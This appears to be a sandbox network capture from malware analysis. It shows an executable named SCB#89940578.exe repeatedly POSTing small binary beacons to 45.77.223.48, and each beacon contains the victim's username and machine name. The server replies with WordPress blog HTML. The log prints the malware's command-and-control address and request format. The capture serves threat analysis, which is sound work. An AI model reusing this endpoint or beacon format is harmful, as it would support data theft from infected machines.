Apr 26, 2024 04:43:24.545587063 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
54	192.168.2.4	49797	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:24.904349089 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:25.092916965 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:25.995968103 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:24 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:25.996140957 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:26.007555962 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:26.007838964 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:26.007989883 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:26.008064032 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:26.008256912 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:26.008277893 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:26.008351088 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:43:26.008369923 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
55	192.168.2.4	49798	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:26.329931974 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:26.518594027 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:27.416711092 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:26 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:27.416805983 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:27.417428970 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:27.425371885 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:27.425705910 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:27.425889015 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:27.426054001 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:27.426201105 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:27.426279068 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:27.426604986 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
56	192.168.2.4	49799	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:27.753457069 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:27.942461014 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:28.843020916 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:27 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:28.843116999 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:28.843322992 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:28.852824926 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:28.853230953 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:28.853327036 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:28.853367090 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:28.853404999 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:28.853446960 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo
Apr 26, 2024 04:43:29.029711962 CEST	1289	IN	Data Raw: 6d 61 72 67 69 6e 2d 72 69 67 68 74 3a 2e 35 65 6d 7d 2e 77 70 2d 62 6c 6f 63 6b 2d 73 6f 63 69 61 6c 2d 6c 69 6e 6b 73 2e 68 61 73 2d 73 6d 61 6c 6c 2d 69 63 6f 6e 2d 73 69 7a 65 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 36 70 78 7d 2e 77 70 2d 62 6c Data Ascii: margin-right:.5em}.wp-block-social-links.has-small-icon-size{font-size:16px}.wp-block-social-links,.wp-block-social-links.has-normal-icon-size{font-size:24px}.wp-block-social-links.has-large-icon-size{font-size:36px}.wp-block-social-links.has-

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
57	192.168.2.4	49800	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:29.172203064 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:29.360411882 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:30.273797035 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:29 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:30.273865938 CEST	59	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="
Apr 26, 2024 04:43:30.273926020 CEST	82	IN	Data Raw: 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 2f 3e 0a Data Ascii: UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:30.282167912 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:30.282514095 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:30.282660961 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
Apr 26, 2024 04:43:30.282753944 CEST	152	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 43 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Comments Feed" href="http://45.77.223.48/~blog/?feed=comments-rss2" />
Apr 26, 2024 04:43:30.282916069 CEST	1289	IN	Data Raw: 3c 73 63 72 69 70 74 3e 0a 77 69 6e 64 6f 77 2e 5f 77 70 65 6d 6f 6a 69 53 65 74 74 69 6e 67 73 20 3d 20 7b 22 62 61 73 65 55 72 6c 22 3a 22 68 74 74 70 73 3a 5c 2f 5c 2f 73 2e 77 2e 6f 72 67 5c 2f 69 6d 61 67 65 73 5c 2f 63 6f 72 65 5c 2f 65 6d Data Ascii: <script>window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/45.77.223.4
Apr 26, 2024 04:43:30.283008099 CEST	1289	IN	Data Raw: 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 64 5c 75 32 62 31 62 22 2c 22 5c 75 64 38 33 64 5c 75 64 63 32 36 5c 75 32 30 30 62 5c 75 32 62 31 62 22 29 7d 72 65 74 75 72 6e 21 31 7d 66 75 6e 63 74 69 6f 6e 20 66 28 65 2c 74 2c 6e 29 7b 76 61 72 Data Ascii: d83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadF
Apr 26, 2024 04:43:30.283272982 CEST	1289	IN	Data Raw: 73 61 67 65 3d 66 75 6e 63 74 69 6f 6e 28 65 29 7b 63 28 6e 3d 65 2e 64 61 74 61 29 2c 61 2e 74 65 72 6d 69 6e 61 74 65 28 29 2c 74 28 6e 29 7d 29 7d 63 61 74 63 68 28 65 29 7b 7d 63 28 6e 3d 66 28 73 2c 75 2c 70 29 29 7d 74 28 6e 29 7d 29 2e 74 Data Ascii: sage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.suppo

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
58	192.168.2.4	49801	45.77.223.48	80	7272	C:\Users\user\Desktop\SCB#89940578.exe

Timestamp	Bytes transferred	Direction	Data
Apr 26, 2024 04:43:30.595489979 CEST	246	OUT	POST /~blog/?ajax=posts.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 45.77.223.48 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 3E699C10 Content-Length: 149 Connection: close
Apr 26, 2024 04:43:30.785079956 CEST	149	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 0a 00 00 00 6a 00 6f 00 6e 00 65 00 73 00 01 00 0c 00 00 00 31 00 32 00 33 00 37 00 31 00 36 00 01 00 10 00 00 00 4a 00 4f 00 4e 00 45 00 53 00 2d 00 50 00 43 00 00 05 00 00 00 04 00 00 01 Data Ascii: (ckav.rujones123716JONES-PC0FDD42EE188E931437F4FBE2C
Apr 26, 2024 04:43:32.741786957 CEST	215	IN	HTTP/1.1 200 OK Date: Fri, 26 Apr 2024 02:43:30 GMT Server: Apache Link: <http://45.77.223.48/~blog/index.php?rest_route=/>; rel="https://api.w.org/" Connection: close Content-Type: text/html; charset=UTF-8
Apr 26, 2024 04:43:32.742036104 CEST	141	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 09 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 2f 3e 0a 09 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 Data Ascii: <!DOCTYPE html><html lang="en-US"><head><meta charset="UTF-8" /><meta name="viewport" content="width=device-width, initial-scale=1" />
Apr 26, 2024 04:43:32.753637075 CEST	57	IN	Data Raw: 3c 6d 65 74 61 20 6e 61 6d 65 3d 27 72 6f 62 6f 74 73 27 20 63 6f 6e 74 65 6e 74 3d 27 6d 61 78 2d 69 6d 61 67 65 2d 70 72 65 76 69 65 77 3a 6c 61 72 67 65 27 20 2f 3e 0a Data Ascii: <meta name='robots' content='max-image-preview:large' />
Apr 26, 2024 04:43:32.754947901 CEST	32	IN	Data Raw: 3c 74 69 74 6c 65 3e 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 3c 2f 74 69 74 6c 65 3e 0a Data Ascii: <title>Natural biz blog</title>
Apr 26, 2024 04:43:32.756313086 CEST	134	IN	Data Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 22 61 6c 74 65 72 6e 61 74 65 22 20 74 79 70 65 3d 22 61 70 70 6c 69 63 61 74 69 6f 6e 2f 72 73 73 2b 78 6d 6c 22 20 74 69 74 6c 65 3d 22 4e 61 74 75 72 61 6c 20 62 69 7a 20 62 6c 6f 67 20 26 72 61 71 75 6f 3b 20 46 Data Ascii: <link rel="alternate" type="application/rss+xml" title="Natural biz blog » Feed" href="http://45.77.223.48/~blog/?feed=rss2" />
